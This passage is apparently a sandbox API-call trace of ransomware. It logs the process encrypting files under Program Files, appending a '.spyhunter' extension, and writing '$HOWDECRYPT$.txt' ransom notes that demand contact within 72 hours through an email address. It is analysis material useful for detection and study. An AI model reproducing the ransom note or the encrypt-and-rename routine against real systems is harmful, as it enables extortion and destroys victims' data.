(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.325] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e390, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e390*=0x2ac, lpOverlapped=0x0) returned 1 [0179.325] CloseHandle (hObject=0x178) returned 1 [0179.325] GetProcessHeap () returned 0x2c0000 [0179.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7f5e0 | out: hHeap=0x2c0000) returned 1 [0179.325] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e330 | out: pbBuffer=0x57e330) returned 1 [0179.325] GetProcessHeap () returned 0x2c0000 [0179.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.325] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e328*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e328*=0x30) returned 1 [0179.326] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1031\\hxdsui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.327] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll") returned 77 [0179.327] StrStrW (lpFirst="hxdsui.dll", lpSrch=".txt") returned 0x0 [0179.327] GetProcessHeap () returned 0x2c0000 [0179.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0179.327] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e2ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e2ec*=0x2800, lpOverlapped=0x0) returned 1 [0179.590] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.590] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e2ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e2ec*=0x2800, lpOverlapped=0x0) returned 1 [0179.590] GetProcessHeap () returned 0x2c0000 [0179.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0179.590] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.590] WriteFile (in: hFile=0x178, lpBuffer=0x57e32c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e2ec, lpOverlapped=0x0 | out: lpBuffer=0x57e32c*, lpNumberOfBytesWritten=0x57e2ec*=0x4, lpOverlapped=0x0) returned 1 [0179.649] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e2ec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e2ec*=0x30, lpOverlapped=0x0) returned 1 [0179.649] CloseHandle (hObject=0x178) returned 1 [0179.649] GetProcessHeap () returned 0x2c0000 [0179.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.649] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll.spyhunter") returned 87 [0179.649] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1031\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1031\\hxdsui.dll.spyhunter")) returned 1 [0179.650] GetProcessHeap () returned 0x2c0000 [0179.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.650] GetProcessHeap () returned 0x2c0000 [0179.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.650] GetProcessHeap () returned 0x2c0000 [0179.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee7d78 | out: hHeap=0x2c0000) returned 1 [0179.650] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.651] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.651] WriteFile (in: hFile=0x178, lpBuffer=0x57e25f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e388, lpOverlapped=0x0 | out: lpBuffer=0x57e25f*, lpNumberOfBytesWritten=0x57e388*=0x127, lpOverlapped=0x0) returned 1 [0179.652] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.652] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e388, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e388*=0x2ac, lpOverlapped=0x0) returned 1 [0179.652] CloseHandle (hObject=0x178) returned 1 [0179.652] GetProcessHeap () returned 0x2c0000 [0179.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf308 | out: hHeap=0x2c0000) returned 1 [0179.652] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.654] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.654] WriteFile (in: hFile=0x178, lpBuffer=0x57e25b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e384, lpOverlapped=0x0 | out: lpBuffer=0x57e25b*, lpNumberOfBytesWritten=0x57e384*=0x127, lpOverlapped=0x0) returned 1 [0179.655] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.655] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e384, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e384*=0x2ac, lpOverlapped=0x0) returned 1 [0179.655] CloseHandle (hObject=0x178) returned 1 [0179.655] GetProcessHeap () returned 0x2c0000 [0179.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7b1d8 | out: hHeap=0x2c0000) returned 1 [0179.655] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_tw\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.656] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.656] WriteFile (in: hFile=0x178, lpBuffer=0x57e257*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e380, lpOverlapped=0x0 | out: lpBuffer=0x57e257*, lpNumberOfBytesWritten=0x57e380*=0x127, lpOverlapped=0x0) returned 1 [0179.657] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.657] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e380, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e380*=0x2ac, lpOverlapped=0x0) returned 1 [0179.657] CloseHandle (hObject=0x178) returned 1 [0179.657] GetProcessHeap () returned 0x2c0000 [0179.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e76d00 | out: hHeap=0x2c0000) returned 1 [0179.657] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e320 | out: pbBuffer=0x57e320) returned 1 [0179.657] GetProcessHeap () returned 0x2c0000 [0179.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.657] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e318*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e318*=0x30) returned 1 [0179.657] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_tw\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.658] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg") returned 79 [0179.658] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.658] GetProcessHeap () returned 0x2c0000 [0179.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0179.658] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e2dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e2dc*=0x15d, lpOverlapped=0x0) returned 1 [0179.659] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.659] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x57e2dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e2dc*=0x15d, lpOverlapped=0x0) returned 1 [0179.659] GetProcessHeap () returned 0x2c0000 [0179.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.659] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.659] WriteFile (in: hFile=0x178, lpBuffer=0x57e31c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e2dc, lpOverlapped=0x0 | out: lpBuffer=0x57e31c*, lpNumberOfBytesWritten=0x57e2dc*=0x4, lpOverlapped=0x0) returned 1 [0179.659] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e2dc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e2dc*=0x30, lpOverlapped=0x0) returned 1 [0179.659] CloseHandle (hObject=0x178) returned 1 [0179.659] GetProcessHeap () returned 0x2c0000 [0179.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.659] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_tw\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_tw\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.662] GetProcessHeap () returned 0x2c0000 [0179.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.662] GetProcessHeap () returned 0x2c0000 [0179.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.662] GetProcessHeap () returned 0x2c0000 [0179.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e76c18 | out: hHeap=0x2c0000) returned 1 [0179.662] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_cn\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.662] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.663] WriteFile (in: hFile=0x178, lpBuffer=0x57e24f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e378, lpOverlapped=0x0 | out: lpBuffer=0x57e24f*, lpNumberOfBytesWritten=0x57e378*=0x127, lpOverlapped=0x0) returned 1 [0179.663] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.663] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e378, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e378*=0x2ac, lpOverlapped=0x0) returned 1 [0179.663] CloseHandle (hObject=0x178) returned 1 [0179.664] GetProcessHeap () returned 0x2c0000 [0179.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e76b30 | out: hHeap=0x2c0000) returned 1 [0179.664] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e318 | out: pbBuffer=0x57e318) returned 1 [0179.664] GetProcessHeap () returned 0x2c0000 [0179.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.664] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e310*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e310*=0x30) returned 1 [0179.664] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_cn\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.664] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg") returned 79 [0179.664] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.664] GetProcessHeap () returned 0x2c0000 [0179.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0179.665] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e2d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e2d4*=0x15d, lpOverlapped=0x0) returned 1 [0179.665] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.665] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x57e2d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e2d4*=0x15d, lpOverlapped=0x0) returned 1 [0179.665] GetProcessHeap () returned 0x2c0000 [0179.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.665] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.666] WriteFile (in: hFile=0x178, lpBuffer=0x57e314*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e2d4, lpOverlapped=0x0 | out: lpBuffer=0x57e314*, lpNumberOfBytesWritten=0x57e2d4*=0x4, lpOverlapped=0x0) returned 1 [0179.666] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e2d4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e2d4*=0x30, lpOverlapped=0x0) returned 1 [0179.666] CloseHandle (hObject=0x178) returned 1 [0179.666] GetProcessHeap () returned 0x2c0000 [0179.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.666] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_cn\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_cn\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.667] GetProcessHeap () returned 0x2c0000 [0179.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.667] GetProcessHeap () returned 0x2c0000 [0179.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.667] GetProcessHeap () returned 0x2c0000 [0179.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e76a48 | out: hHeap=0x2c0000) returned 1 [0179.667] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\uk_ua\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.667] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.668] WriteFile (in: hFile=0x178, lpBuffer=0x57e247*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e370, lpOverlapped=0x0 | out: lpBuffer=0x57e247*, lpNumberOfBytesWritten=0x57e370*=0x127, lpOverlapped=0x0) returned 1 [0179.668] lstrlenA 